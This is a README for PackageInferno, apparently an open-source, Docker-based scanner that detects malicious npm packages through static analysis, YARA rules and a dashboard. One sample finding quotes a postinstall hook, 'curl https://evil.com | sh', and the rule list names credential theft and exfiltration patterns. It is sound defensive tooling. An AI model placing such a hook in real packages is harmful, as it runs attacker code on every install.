PackageInferno


Blazingly simple, Docker‑first npm supply‑chain scanner. One compose file runs:

  • Enumerator → builds the queue of packages
  • Fetcher → downloads tarballs (and optionally uploads to S3)
  • Analyzer → static analysis + optional YARA
  • Postgres → local DB for findings
  • Streamlit Dashboard → visualize findings on http://localhost:8501

This is the container‑only edition. The project can also be scaled out with EC2, SQS, and RDS; most of the plumbing for that is already in the toolset.


What you get

  • End‑to‑end pipeline in Docker (no host installs beyond Docker)
  • Configurable rules via scan.yml (allowlists, thresholds, YARA)
  • Local Postgres schema + scan history (scan_runs) ready to go
  • Optional S3 uploads for tarballs and findings (credentials via ~/.aws)
  • Streamlit dashboard: search, drill‑down, and analytics

Contents

  • docker-compose.yml – services: db, enumerator, fetcher, analyzer, dashboard, init-db
  • enumerator/ – Node worker that builds the NDJSON queue
  • fetcher/ – Node worker that downloads tarballs (+ uploads to S3 if enabled)
  • analyzer/ – Python static analyzer (+ optional YARA inline)
  • dashboard/ – Streamlit app (port 8501)
  • infra/migrations.sql – core DB schema (packages, versions, findings, scores, indexes)
  • infra/20251106_scan_runs.sql – scan history table
  • scan.yml – analysis configuration (rules, scoring, allowlists, YARA)
  • scripts/run_pipeline.sh – run enumerate → fetch → analyze
  • scripts/init_db.sh – bootstrap DB schema
  • scripts/test_setup.sh – automated setup validation
  • SCANNING_GUIDE.md – detailed scanning strategies and examples

Quick start (local)

Prereqs: Docker Desktop (or Docker Engine) with Compose v2.

One-Line Install

curl -fsSL https://raw.githubusercontent.com/MHaggis/Package-Inferno/main/install.sh | bash

This clones the repo to ~/package-inferno and prints instructions to get started.

Option A: Use Pre-built Images (Fastest)

Pull and run pre-built containers from GitHub Container Registry:

# Clone the repo (for config files and scripts)
git clone https://github.com/MHaggis/Package-Inferno.git
cd Package-Inferno

# Run with pre-built images
docker compose -f docker-compose.ghcr.yml up -d db
./scripts/init_db.sh
SEEDS="lodash,express" docker compose -f docker-compose.ghcr.yml run --rm enumerator
docker compose -f docker-compose.ghcr.yml run --rm fetcher
docker compose -f docker-compose.ghcr.yml run --rm analyzer

Available images:

  • ghcr.io/mhaggis/package-inferno/enumerator:main
  • ghcr.io/mhaggis/package-inferno/fetcher:main
  • ghcr.io/mhaggis/package-inferno/analyzer:main

Option B: Build from Source

Automated Setup Validation

Run the test script to validate your installation:

./scripts/test_setup.sh

This will:

  • ✓ Check Docker and Docker Compose
  • ✓ Start and initialize the database
  • ✓ Run a test scan (2 packages)
  • ✓ Verify findings are stored correctly

Manual Setup

  1. Start Postgres and initialize the schema:
docker compose up -d db
./scripts/init_db.sh
  2. Run the pipeline:
./scripts/run_pipeline.sh
  3. Launch the dashboard:
docker compose up -d dashboard
# open http://localhost:8501

Findings land under ./out/findings/*.findings.json and, when the DB is enabled, in the findings table.


Scanning Modes

PackageInferno supports multiple scanning strategies depending on your goals:

Mode            | Use Case                         | Speed      | Coverage       | Command
Specific Seeds  | Test/investigate known packages  | Fastest    | Targeted       | SEEDS="pkg1,pkg2"
Small Batch     | Validate setup, sample scan      | Fast       | 10-100 pkgs    | MAX_CHUNKS=2 CHUNK_LIMIT=10
Full Registry   | Comprehensive supply-chain audit | Hours-days | 2M+ pkgs       | MAX_CHUNKS=0 CHUNK_LIMIT=100
Changes Feed    | Monitor new releases (automatic) | Real-time  | Recent updates | Built-in

1. Scan Specific Packages (Recommended for Testing)

Target specific packages you want to analyze:

# Single command with seeds
export SEEDS="lodash,express,axios"
./scripts/run_pipeline.sh

# Or from a file
echo -e "react\nvue\nangular" > packages.txt
export SEEDS_FILE=packages.txt
./scripts/run_pipeline.sh

How I tested initially: Used SEEDS="is-odd,is-even" for quick validation.

2. Scan from npm Registry (_all_docs)

Scan packages paginated from npm's registry:

# Clean previous runs
rm -rf downloads/* out/*

# Scan 2 pages of 10 packages each (20 packages)
export MAX_CHUNKS=2        # Number of pages
export CHUNK_LIMIT=10      # Packages per page
unset SEEDS                # Important: disable seeds mode

# Run individual steps for better visibility
docker compose run --rm enumerator  # Discovers and queues
docker compose run --rm fetcher     # Downloads tarballs
docker compose run --rm analyzer    # Scans for threats

Example output:

config: chunkLimit=10, maxChunks=2
checking recent changes feed...
changes feed: enqueued 2 new versions
enumerating via _all_docs (fresh scan)
page 1/2 count: 10
page 2/2 count: 10
done, enqueued 22 (22 new versions)

3. Continuous Monitoring (Unbounded Scan)

Scan the entire npm registry:

export MAX_CHUNKS=0        # 0 = unbounded
export CHUNK_LIMIT=100     # Larger batches for efficiency
./scripts/run_pipeline.sh

Warning: This will run for hours/days and scan hundreds of thousands of packages. Monitor disk space and database size.

4. Resume Interrupted Scans

The enumerator saves state to ./out/enumerator_state.json with cursor position:

{
  "last_seq": "0",
  "last_startkey": "package-name",
  "last_run": "2025-11-23T19:24:49.123Z",
  "last_processed": 22,
  "last_new": 22
}

Simply re-run the pipeline and it will resume from the last cursor:

./scripts/run_pipeline.sh  # Automatically resumes

To force a fresh scan:

rm -f out/enumerator_state.json
./scripts/run_pipeline.sh
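
Under the hood this is keyset pagination against a CouchDB-style _all_docs endpoint: each page is requested starting just past the last key seen, which is why the saved last_startkey is enough to resume. A rough Python sketch of the idea (the endpoint URL and exact parameter handling are assumptions; the real enumerator is Node):

import json
import requests

REGISTRY = "https://replicate.npmjs.com/registry/_all_docs"  # assumed endpoint

state = {}
try:
    with open("out/enumerator_state.json") as fh:
        state = json.load(fh)
except FileNotFoundError:
    pass  # no state file -> fresh scan

params = {"limit": 10}
if state.get("last_startkey"):
    # CouchDB expects startkey as a JSON-encoded string; skip=1 moves
    # past the last package already processed on the previous run.
    params["startkey"] = json.dumps(state["last_startkey"])
    params["skip"] = 1

page = requests.get(REGISTRY, params=params, timeout=30).json()
names = [row["id"] for row in page["rows"]]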

Example Scan Results

From a 2-page scan of 22 packages, here's what PackageInferno detected:

-- Top suspicious packages by score
SELECT p.name, s.score, s.label, COUNT(f.id) as findings 
FROM packages p 
JOIN versions v ON p.id = v.package_id 
JOIN scores s ON v.id = s.version_id 
LEFT JOIN findings f ON v.id = f.version_id 
GROUP BY p.name, s.score, s.label 
ORDER BY s.score DESC;

-- Results:
 name                  | score | label     | findings
-----------------------+-------+-----------+----------
 rendition             |   606 | malicious |      153
 vs-deploy             |   454 | malicious |      119
 --123hoodmane-pyodide |   213 | malicious |       46

What made rendition so suspicious?

  • 57 × url_outside_allowlist - Non-allowlisted domains
  • 46 × suspicious_pattern - Shell/eval patterns
  • 12 × advanced_obfuscation - Hex encoding, XOR, string arrays
  • 6 × big_base64_blob - Large encoded payloads
  • 18 × url_in_code - Embedded URLs

The scoring system (configured in scan.yml) aggregates these findings to produce a risk score and label (clean, suspicious, or malicious).
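
The aggregation itself is easy to picture: sum the per-rule weights and compare against the thresholds. A minimal Python sketch (the weights and thresholds here are hypothetical; the real logic lives in the analyzer and scan.yml):

def score(findings, weights, thresholds):
    # Sum the configured weight for each finding's rule (unknown rules score 0).
    total = sum(weights.get(f["rule"], 0) for f in findings)
    if total >= thresholds["malicious"]:
        label = "malicious"
    elif total >= thresholds["suspicious"]:
        label = "suspicious"
    else:
        label = "clean"
    return total, label

findings = [{"rule": "c2_webhook"}, {"rule": "env_snoop"}]
weights = {"c2_webhook": 8, "env_snoop": 5}  # hypothetical weights
print(score(findings, weights, {"suspicious": 7, "malicious": 12}))  # (13, 'malicious')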


Exploring Results

Via Dashboard (Recommended)

Open http://localhost:8501 after running docker compose up -d dashboard

Features:

  • 📊 Overview Tab: Summary stats, score distribution charts
  • 🔍 Search Tab: Find packages by name, filter by risk label
  • ⚠️ High Risk Tab: Top malicious packages with drill-down
  • 🎯 C2 Analysis: Packages with known exfiltration endpoints
  • 📈 Analytics Tab: Trends, common rules, temporal analysis

Via Database Queries

Direct SQL access for custom analysis:

# Connect to database
docker exec -it pi-postgres psql -U piuser -d packageinferno

Useful queries:

-- Packages with credential theft attempts
SELECT DISTINCT p.name, v.version, s.score
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
JOIN scores s ON v.id = s.version_id
WHERE f.rule = 'env_snoop'
ORDER BY s.score DESC;

-- All C2/webhook destinations found
SELECT p.name, f.details->>'endpoints' as c2_endpoints
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'c2_webhook';

-- Typosquatting attempts
SELECT 
  p.name,
  f.details->>'target_package' as impersonating,
  f.details->>'similarity' as similarity_pct,
  f.details->>'typosquat_type' as attack_type
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'typosquat_detected'
ORDER BY (f.details->>'similarity')::float DESC;

-- Packages with native binaries
SELECT p.name, f.details->>'path' as binary_path
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'native_binary_present';

Via JSON Files

Findings are also saved as structured JSON in ./out/findings/:

# View findings for a specific package
cat out/findings/packagename@1.0.0.findings.json | jq .

# Count findings by severity
jq -r '.findings[].severity' out/findings/*.findings.json | sort | uniq -c

# Extract all C2 URLs found
jq -r '.findings[] | select(.rule=="c2_webhook") | .details.full_urls[]' out/findings/*.findings.json

Optional: S3 integration (tarballs + findings)

If you want artifacts in S3:

  • Create buckets (choose your own names):
    • package-inferno-tarballs (raw npm tarballs)
    • package-inferno-findings (analyzer outputs)
  • Ensure your ~/.aws contains valid credentials (profile or environment based).
  • Export env vars before running the pipeline:
export AWS_REGION=us-west-2
export S3_TARBALLS=package-inferno-tarballs
export S3_FINDINGS=package-inferno-findings
export AWS_PROFILE=default   # optional; or rely on env creds

The compose mounts ~/.aws into fetcher and analyzer. If LOCAL_ONLY=false, the fetcher uploads tarballs to S3_TARBALLS. If S3_FINDINGS is set, analyzer uploads findings JSON after writing locally.
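
Credential resolution follows the standard AWS chain (environment variables first, then the mounted ~/.aws profile). As a minimal illustration of the upload step, a boto3 sketch (the object key layout is illustrative, not necessarily what the analyzer uses):

import os
import boto3

# boto3 picks up credentials from env vars or the mounted ~/.aws automatically.
s3 = boto3.client("s3", region_name=os.environ.get("AWS_REGION", "us-west-2"))
s3.upload_file(
    "out/findings/lodash@4.17.21.findings.json",  # local findings JSON
    os.environ["S3_FINDINGS"],                    # bucket name from env
    "findings/lodash@4.17.21.findings.json",      # object key (illustrative)
)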

Minimal IAM policy example (attach it to the user or role you're using):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "S3Access",
      "Effect": "Allow",
      "Action": ["s3:PutObject","s3:GetObject","s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::package-inferno-tarballs",
        "arn:aws:s3:::package-inferno-tarballs/*",
        "arn:aws:s3:::package-inferno-findings",
        "arn:aws:s3:::package-inferno-findings/*"
      ]
    }
  ]
}

Configuration

Main knobs live in scan.yml. Highlights:

  • analysis.allow_domains – domains that won’t raise “outside allowlist”
  • analysis.allowlist.build_tools – regexes for benign build steps
  • analysis.yara.* – enable inline YARA (default on), rule path, size/time limits
  • scoring.rule_weights and scoring.thresholds – tune “suspicious/malicious”

Container environment variables you can set:

  • Enumerator:
    • DAYS (default 30), CHUNK_LIMIT (default 100), MAX_CHUNKS (default 5)
    • SEEDS, SEEDS_FILE – seed package names
    • LOCAL_ONLY=true (queue to file), DB_URL for dedupe against DB
  • Fetcher:
    • LOCAL_ONLY=false to upload tarballs to S3
    • S3_TARBALLS, AWS_REGION, AWS_PROFILE
  • Analyzer:
    • MAX_EXTRACT_BYTES=0 for unlimited extraction
    • S3_FINDINGS, AWS_REGION
    • DB_URL to write findings and scores into Postgres

The DB URL is pre‑wired for local compose:

postgres://piuser:pipass@db:5432/packageinferno

How it works (flow)

  1. Enumerator hits the npm registry and writes an NDJSON queue to ./out/fetch_queue.ndjson (and can upsert "queued" versions to the DB); a sample record is sketched after this list.
  2. Fetcher reads the queue, downloads tarballs to ./downloads, and uploads to S3 if configured.
  3. Analyzer scans tarballs with heuristics + optional YARA and writes structured findings JSON to ./out/findings. If DB is configured, it upserts findings and scores.
  4. Dashboard queries the local DB to visualize stats, search packages, and drill into details.
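
To make the hand-off between stages concrete, here is what writing one queue record might look like (the field names are illustrative, not the project's actual schema):

import json

# Hypothetical queue record; field names are illustrative.
job = {
    "name": "lodash",
    "version": "4.17.21",
    "tarball": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
}
with open("out/fetch_queue.ndjson", "a") as queue:
    queue.write(json.dumps(job) + "\n")  # NDJSON: one JSON object per line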

Component Details

Enumerator (enumerator/src/enumerator.js)

Purpose: Discovers npm packages to scan and builds the work queue.

What it does:

  • Pulls package metadata from npm's registry and replication feed
  • Supports multiple modes:
    • Seeds mode: Scan specific packages via SEEDS env var or SEEDS_FILE
    • Changes feed: Monitor _changes endpoint for recent updates
    • Full scan: Paginate through _all_docs endpoint (with resumable cursor)
  • Deduplicates against DB to avoid re-scanning analyzed versions
  • Outputs NDJSON queue to ./out/fetch_queue.ndjson or SQS

Key environment variables:

  • SEEDS="pkg1,pkg2" - Comma-separated package names to scan
  • SEEDS_FILE - Path to text file with one package per line
  • MAX_CHUNKS=5 - Limit pagination (0 = unbounded)
  • CHUNK_LIMIT=100 - Packages per API page
  • DB_URL - Postgres connection for deduplication

Example usage:

# Scan specific packages
export SEEDS="lodash,express,axios"
docker compose run --rm enumerator

# Scan from file
echo -e "react\nvue\nangular" > packages.txt
export SEEDS_FILE=packages.txt
docker compose run --rm enumerator

Fetcher (fetcher/src/fetcher.js)

Purpose: Downloads npm tarballs from the registry.

What it does:

  • Reads queue from ./out/fetch_queue.ndjson (or SQS)
  • Downloads tarballs with retry logic and backoff
  • Verifies SHA1 checksums (warns on mismatch; see the sketch at the end of this section)
  • Saves to ./downloads/ as scope__name@version.tgz
  • Optionally uploads to S3 bucket (S3_TARBALLS)
  • Forwards completed jobs to analyzer queue (SQS mode)

Key environment variables:

  • LOCAL_ONLY=true - Skip S3 uploads (local-only mode)
  • S3_TARBALLS - S3 bucket name for tarball storage
  • DOWNLOAD_DIR=./downloads - Local output directory
  • MAX_RETRIES=5 - HTTP retry attempts

S3 key format: npm-raw-tarballs/{name}/{version}.tgz
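
The retry-and-verify behavior can be sketched as follows (Python for illustration; the real fetcher is Node and its exact logic may differ):

import hashlib
import time

import requests

def fetch_tarball(url, expected_sha1, retries=5):
    """Download with exponential backoff; warn (don't fail) on checksum mismatch."""
    for attempt in range(retries):
        try:
            resp = requests.get(url, timeout=60)
            resp.raise_for_status()
            data = resp.content
            if hashlib.sha1(data).hexdigest() != expected_sha1:
                print(f"WARN: sha1 mismatch for {url}")
            return data
        except requests.RequestException:
            time.sleep(2 ** attempt)  # backoff: 1s, 2s, 4s, ...
    raise RuntimeError(f"failed after {retries} attempts: {url}")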


Analyzer (analyzer/src/analyzer.py)

Purpose: Static analysis engine that detects malicious patterns in packages.

What it does:

  • Extracts tarballs with safety checks (path traversal, size limits)
  • Parses package.json for metadata and lifecycle hooks
  • Scans all files for suspicious patterns:
    • Lifecycle hooks: Shell spawns, downloaders in install scripts
    • Network activity: HTTP clients, C2 webhooks (Discord, Telegram, etc.)
    • Obfuscation: High entropy, base64 blobs, hex encoding, XOR
    • Credential theft: Environment variable access, FS writes to sensitive paths
    • Typosquatting: Levenshtein distance + unicode substitution checks (sketched after this list)
    • Phishing: Fake CAPTCHA, credential forms, iframe embeds
    • Binaries: Native executables, WASM, prebuilt fetchers
  • Runs YARA rules (downloaded from YARA-Forge) if enabled
  • Scores findings using weighted rules from scan.yml
  • Writes structured JSON to ./out/findings/ and upserts to DB
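
As a concrete example of one check, the typosquat detection boils down to string similarity against popular package names. A stdlib-only sketch using difflib's ratio in place of true Levenshtein distance (the target list and threshold are illustrative; the analyzer's actual implementation differs):

from difflib import SequenceMatcher

POPULAR = ["lodash", "express", "react", "axios"]  # illustrative target list

def typosquat_candidates(name, threshold=0.8):
    """Flag names that are near (but not equal to) a popular package."""
    hits = []
    for target in POPULAR:
        sim = SequenceMatcher(None, name, target).ratio()
        if name != target and sim >= threshold:
            hits.append((target, round(sim * 100, 1)))
    return hits

print(typosquat_candidates("lodahs"))  # [('lodash', 83.3)]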

Detection rules (see analyzer/src/analyzer.py for full list):

  • lifecycle_script - Risky install/postinstall hooks
  • url_outside_allowlist - Network calls to non-allowed domains
  • c2_webhook - Known exfil endpoints (Discord, Slack, Telegram)
  • env_snoop - Access to AWS keys, tokens, passwords
  • writes_outside_pkg - FS writes to .ssh, .npmrc, system dirs
  • typosquat_detected - Package name similar to popular packages
  • advanced_obfuscation - Hex, XOR, string arrays, control flow flattening
  • yara_match - YARA rule hits (malware, exploits, webshells)
  • phishing_form - Credential harvesting forms
  • native_binary_present - PE/ELF/Mach-O executables

Key environment variables:

  • MAX_EXTRACT_BYTES=0 - Extraction size limit (0 = unlimited)
  • SCAN_YML=/app/scan.yml - Path to config file
  • DB_URL - Postgres connection for findings storage
  • S3_FINDINGS - S3 bucket for findings upload

Output format (*.findings.json):

{
  "tgz": "/downloads/pkg@1.0.0.tgz",
  "findings": [
    {
      "rule": "lifecycle_script",
      "severity": "high",
      "details": {
        "key": "postinstall",
        "value": "curl https://evil.com | sh",
        "tags": ["shell_spawn", "downloader"],
        "explanation": "High-risk postinstall hook: shell_spawn, downloader"
      }
    }
  ]
}

Customizing the Analyzer

Adding New Detection Rules

1. Pattern-based detection (add to analyzer/src/analyzer.py):

# Define regex pattern
CUSTOM_PATTERN_RE = re.compile(rb'dangerous-function\s*\(', re.I)

# Add to analyze_file_bytes() function
def analyze_file_bytes(path: Path, b: bytes, allow_domains: list[str]):
    # ... existing code ...
    
    # Your custom check
    if CUSTOM_PATTERN_RE.search(b):
        out.append({
            'rule': 'custom_dangerous_function',
            'severity': 'high',
            'details': {
                'path': str(path),
                'explanation': 'Detected dangerous-function call'
            }
        })
    
    return out

2. Add scoring weights (scan.yml):

scoring:
  rule_weights:
    custom_dangerous_function: 6  # Your new rule
    # ... existing rules ...
  thresholds:
    suspicious: 7
    malicious: 12
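
With these numbers, two custom_dangerous_function hits alone contribute 2 × 6 = 12, enough on their own to cross the malicious threshold.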

3. Update the scoring function (analyzer/src/analyzer.py):

def score_findings(findings, scoring):
    weights = scoring.get('rule_weights', {})
    score = 0
    for f in findings:
        rule = f['rule']
        w = 0
        # ... existing rules ...
        elif rule == 'custom_dangerous_function':
            w = weights.get('custom_dangerous_function', 6)
        score += int(w)
    # ... rest of function ...

Adding Custom YARA Rules

1. Create custom rule file (yara-rules/custom.yar):

rule CustomMalware {
    meta:
        description = "Detects custom threat pattern"
        severity = "high"
    strings:
        $s1 = "malicious_string" ascii
        $s2 = /evil_regex_[0-9]{4}/
    condition:
        any of them
}

2. Update scan.yml:

analysis:
  yara:
    enabled: true
    rules_path: yara-rules/custom.yar  # Point to your rules
    max_file_size_mb: 10
    timeout_seconds: 30

3. Mount custom rules in docker-compose.yml:

analyzer:
  volumes:
    - ./yara-rules:/app/yara-rules:ro
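
To sanity-check a rule before wiring it into the pipeline, you can compile and run it directly with yara-python (pip install yara-python; the file paths here are illustrative):

import yara

# Compile the custom rule file and scan one extracted file.
rules = yara.compile(filepath="yara-rules/custom.yar")
matches = rules.match(filepath="downloads/extracted/index.js", timeout=30)
for m in matches:
    print(m.rule, m.meta.get("severity"))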

Domain Allowlist

Add trusted domains to scan.yml to reduce false positives:

analysis:
  allow_domains:
    - registry.npmjs.org
    - github.com
    - your-cdn.com  # Add your domain
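
One plausible way the url_outside_allowlist check uses this list is a host suffix match (a sketch of the idea; the analyzer's actual matching may differ):

from urllib.parse import urlparse

ALLOW_DOMAINS = ["registry.npmjs.org", "github.com", "your-cdn.com"]

def outside_allowlist(url):
    host = (urlparse(url).hostname or "").lower()
    # Allow exact matches and subdomains of allowlisted domains.
    return not any(host == d or host.endswith("." + d) for d in ALLOW_DOMAINS)

print(outside_allowlist("https://raw.githubusercontent.com/x"))  # True (flagged)
print(outside_allowlist("https://api.github.com/repos"))         # False (allowed)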

Benign Build Tools

Allowlist legitimate build commands:

analysis:
  allowlist:
    build_tools:
      - \bmy-custom-build-tool\b
      - \bmake\s+clean\b

Troubleshooting

  • “Database connection failed”: make sure docker compose up -d db is running, then re‑run ./scripts/init_db.sh.
  • “AccessDenied” when pushing to S3: verify ~/.aws/credentials, AWS_REGION, and bucket policy/permissions.
  • YARA timeouts: lower file size limits or disable inline YARA in scan.yml (analysis.yara.enabled: false).
  • Rate limits from npm: the pipeline retries with backoff and sets a User-Agent header; you can lower CHUNK_LIMIT and ramp MAX_CHUNKS up gradually.

About

A Public Package Scanner for The Community
